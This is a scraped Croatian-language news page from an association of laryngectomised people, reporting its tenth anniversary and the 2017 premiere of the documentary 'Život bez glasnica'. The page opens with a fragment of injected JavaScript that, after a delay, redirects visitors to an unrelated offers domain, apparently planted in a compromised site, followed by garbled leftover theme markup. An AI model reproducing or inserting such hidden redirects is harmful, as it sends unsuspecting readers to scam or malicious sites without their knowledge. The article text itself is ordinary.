{ window.location.replace('http://offers25942.xyz/'); }, delay);})();_footer_columns3 et_header_style_left et_pb_pagebuilder_layout et_smooth_scroll et_right_sidebar et_divi_theme gecko et_minified_js et_minified_css">
Početna stranica » Arhiva događanja » Događanja » Život bez glasnica

Život bez glasnica

ožu 17, 2017

M. Manestar: HRVATSKA ZAJEDNICA OBILJEŽAVA 10.OBLJETNICU PREMIJEROM FILMA “ŽIVOT BEZ GLASNICA”

 

Proslavom Sv. Blaža u Daruvarskim Toplicama, međunarodnom skupu laringektomiranih i simpoziju o stanju prava laringektomiranih kod nas i susjednim zemljama, kao i Skupštinom, započelo je obilježavanje 10. obljetnice utemeljenja HLZ.

 

Tom je prigodom održana pred auditorijem od 160 osoba pretpremijera filma u produkciji Zajednice “Život bez glasnica”, dok je film službeno predstavljan javnosti u Zagrebu 28. veljače 2017. god. u Kulturno-informativnom centru.

 

Film je u medijima sjajno pozdravljen s afirmativnim komentarima i uz naglašenu poruku i poticaj borbi sa zloćudnom bolešću. Održana je i izvještajna delegatska skupština zajednice, donešene su formalne odluke i poticaj za osnivanjem novih klubova.

 

Predložena je i dopuna programa tradicionalnih Seminara nadomjesnog govora, radi usklađenja potreba nakon suvremenih operacija i tehnološki naprednijih pomagala. Dalje će se usklađivati programi prema potrebama, a i osnivanje novih klubova. Za sada je data privola za klub u Slav. Požegi, dok je u osnivanju i klub u Zadru. U nekim klubovima će zbog promjena u vodstvu trebati potpora Zajednice i konsolidacija u aktivnostima.

 

S veseljem obavještavamo da se u Cvenom križu priprema novi priručnik prve pomoći za vozače u kojem će konačno biti i posebnosti kod pružanja pomoći laringektomiranima.

 

Mr.sc.Tamara Živković Ivanović, prof. logoped, ORL klinika KBC Zagreb:
Dokumentarni film “Život bez glasnica”, priča o životu laringektomiranih osoba kojima je zbog maligne bolesti potpuno odstranjen govorni organ i koji žive i dišu samo kroz mali otvor na donjem dijelu vrata (traheostomom), premijerno je 28.veljače 2017.god. prikazan u Kulturno informativnom centru (KIC) u Zagrebu.

 

Film “Život bez glasnica” priča hrabru priču o životu laringektomiranih osoba koje nakon operacije gube mogućnost glasnog govora, uče ponovno gutati, gube osjet mirisa, ne mogu se kupati.

 

Njima u liječenju, rehabilitaciji i resocijalizaciji pomažu liječnici, medicinske sestre, logopedi, fizioterapeuti, psiholozi, kao i brojni volonteri koji ulažu veliki trud i empatiju kako bi im omogućili bolju kvalitetu života, povratak u obitelj, na radno mjesto i u širu društvenu zajednicu.

 

Klubovi laringektomiranih osoba također imaju veliku ulogu u informiranju, edukaciji i resocijalizaciji operiranih osoba. Do 2006. godine u Hrvatskoj je postojao samo jedan takav klub u Zagrebu, no inicijativom prim.dr. Miloša Manestra osniva se Hrvatska zajednica laringektomiranih osoba, koja danas okuplja 11 klubova u Zagrebu, Samoboru, Karlovcu, Rijeci, Slavonskom Brodu, Osijeku, Varaždinu, Čakovcu, Bjelovaru, Splitu i Puli.

 

Iz kadra u kadar, kroz film govorno vodi osoba bez glasnica i u njemu su prikazane osobe koje su se unatoč operaciji i gubitku govornog organa uspješno vratile na svoje radno mjesto i u svoju radnu sredinu.

 

Značajna nit vodilja filma je i Zagrebački zbor pjevača bez glasnica “Optimisti”, te njihova osnivačica i voditeljica Tamara Živković Ivanović, logopedica koja im pomaže naučiti govoriti, ali ih uči i pjevati. U filmu je također operirana osoba bez glasnica koja svira trubu što je raritet svjetskih razmjera.

 

Autori filma “Život bez glasnica” su Tamara Živković Ivanović i Miloš Manestar, a režiser Božidar Jurjević. Produkciju potpisuje Hrvatska zajednica laringektomiranih osoba.

 

Print Friendly, PDF & Email